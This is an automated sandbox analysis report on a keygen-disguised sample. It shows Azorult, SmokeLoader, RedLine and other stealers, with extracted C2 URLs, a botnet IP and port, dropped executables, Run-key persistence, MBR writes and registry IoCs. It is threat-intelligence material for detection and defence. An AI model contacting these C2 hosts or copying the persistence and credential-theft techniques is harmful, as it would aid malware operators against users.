azorult | 1bf6d14c4b5f59aa30882f4aa25e9e9d703dac905a785fe020ff667600e5fc97

Analysis

max time kernel
284s
max time network
315s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe

Score

10^/10

azorult plugx redline smokeloader vidar new_year_btc backdoor bootkit discovery evasion infostealer macro persistence spyware stealer trojan upx xlm

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

rc4.i32

Extracted

Family

redline

Botnet

NEW_YEAR_BTC

86.105.252.12:35200

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral16/memory/4216-246-0x0000000004CE0000-0x0000000004D03000-memory.dmp	family_redline
behavioral16/memory/4216-248-0x00000000051B0000-0x00000000051D2000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Nirsoft 8 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1605715653158.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1605715653158.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1605715657408.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1605715657408.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1605715663049.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1605715663049.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1605715665799.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1605715665799.exe	Nirsoft

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 34 IoCs

Processes:

intro.exekeygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exe002.exeSetup.exesetup.exealiens.exejg2_2qua.exeaskinstall21.exe0B44010BDDEFEFD3.exe0B44010BDDEFEFD3.exehjjgaa.exejfiag3g_gg.exe1605715653158.exe1605715657408.exe1605715663049.exejfiag3g_gg.exe1605715665799.exeThunderFW.exeMiniThunderPlatform.exeMiniThunderPlatform.exe1021C014A4C9A552.exe1021C014A4C9A552.tmpseed.sfx.exeseed.exeD5F0.exeD814.exeDCF7.exeE053.exeEBDD.exeF4B8.exe

pid	process
2068	intro.exe
1768	keygen-pr.exe
3132	keygen-step-1.exe
3928	keygen-step-3.exe
2076	keygen-step-4.exe
2064	key.exe
700	002.exe
3884	Setup.exe
2280	setup.exe
2944	aliens.exe
2116	jg2_2qua.exe
1272	askinstall21.exe
2328	0B44010BDDEFEFD3.exe
4040	0B44010BDDEFEFD3.exe
2908	hjjgaa.exe
3924	jfiag3g_gg.exe
1396	1605715653158.exe
3488	1605715657408.exe
1268	1605715663049.exe
1308	jfiag3g_gg.exe
2860	1605715665799.exe
2552	ThunderFW.exe
3336	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2072	1021C014A4C9A552.exe
2480	1021C014A4C9A552.tmp
3568	seed.sfx.exe
2464	seed.exe
4904	D5F0.exe
4924	D814.exe
4952	DCF7.exe
4980	E053.exe
5040	EBDD.exe
4216	F4B8.exe

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\gdiview.msi	office_xlm_macros

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 20 IoCs

Processes:

Setup.exeMsiExec.exe0B44010BDDEFEFD3.exeMiniThunderPlatform.exeMiniThunderPlatform.exeseed.exe

pid	process
3884	Setup.exe
3884	Setup.exe
3884	Setup.exe
2624	MsiExec.exe
2328	0B44010BDDEFEFD3.exe
2328	0B44010BDDEFEFD3.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2464	seed.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

412 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
412	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

hjjgaa.exeD5F0.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e53c72c0-0784-423a-8049-005ad90d254b\\D5F0.exe\" --AutoStart"	D5F0.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

jg2_2qua.exealiens.exe0B44010BDDEFEFD3.exe0B44010BDDEFEFD3.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg2_2qua.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	aliens.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0B44010BDDEFEFD3.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

59 ip-api.com
130 api.2ip.ua
131 api.2ip.ua
161 api.2ip.ua
179 checkip.amazonaws.com

flow	ioc
59	ip-api.com
130	api.2ip.ua
131	api.2ip.ua
161	api.2ip.ua
179	checkip.amazonaws.com

Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

aliens.exe0B44010BDDEFEFD3.exe0B44010BDDEFEFD3.exeMiniThunderPlatform.exeMiniThunderPlatform.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	aliens.exe
File opened for modification	\??\PhysicalDrive0	0B44010BDDEFEFD3.exe
File opened for modification	\??\PhysicalDrive0	0B44010BDDEFEFD3.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

aliens.exe

pid process

2944 aliens.exe

pid	process
2944	aliens.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

0B44010BDDEFEFD3.exe

description	pid	process	target process
PID 2328 set thread context of 2840	2328	0B44010BDDEFEFD3.exe	firefox.exe
PID 2328 set thread context of 3276	2328	0B44010BDDEFEFD3.exe	firefox.exe
PID 2328 set thread context of 564	2328	0B44010BDDEFEFD3.exe	firefox.exe
PID 2328 set thread context of 992	2328	0B44010BDDEFEFD3.exe	firefox.exe

Drops file in Program Files directory 38 IoCs

Processes:

1021C014A4C9A552.tmpseed.sfx.exesetup.exe

description	ioc	process
File created	C:\Program Files (x86)\RearRips\is-DVKBV.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-JVLHF.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-HSQJG.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File created	C:\Program Files (x86)\RearRips\images\is-7MSCP.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed	seed.sfx.exe
File created	C:\Program Files (x86)\fjkw1lb5cxpb\__tmp_rar_sfx_access_check_259426546	setup.exe
File created	C:\Program Files (x86)\RearRips\images\is-JSALA.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-715AJ.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-TU2U5.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-VA7BP.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-F9EE7.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-A3442.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\lang\is-4QK7L.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-58MEK.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade	seed.sfx.exe
File created	C:\Program Files (x86)\RearRips\images\is-CL6PE.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\lang\is-4GFJP.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe	setup.exe
File opened for modification	C:\Program Files (x86)\RearRips\DreamTrip.exe	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\unins000.dat	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-HIQ48.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-DOIT2.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-EG9Q5.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-FHGTG.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259521890	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\fjkw1lb5cxpb	setup.exe
File opened for modification	C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe	setup.exe
File opened for modification	C:\Program Files (x86)\RearRips\seed.sfx.exe	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-S9NNH.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-KIBIV.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\RearRips\unins000.dat	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-BMSQP.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-V5CE1.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-EVH2F.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-3H7GO.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-0I3LH.tmp	1021C014A4C9A552.tmp

Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Checks SCSI registry key(s) 3 TTPs 15 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

0B44010BDDEFEFD3.exeseed.exe0B44010BDDEFEFD3.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	0B44010BDDEFEFD3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	0B44010BDDEFEFD3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	0B44010BDDEFEFD3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	0B44010BDDEFEFD3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	0B44010BDDEFEFD3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

560 taskkill.exe
3172 taskkill.exe

pid	process
560	taskkill.exe
3172	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 99918c35c5bdd601	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4afdc32fc5bdd601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "uozcqcm"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d51bf81ac5bdd601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000037fd74651f43afda71cd46c7881a1de12f6f736743bdd4c0fceeb377c8057d315fbd9db2a4a2b706dfce259b64d57affb2fd71287a3a80f8d684	MicrosoftEdge.exe
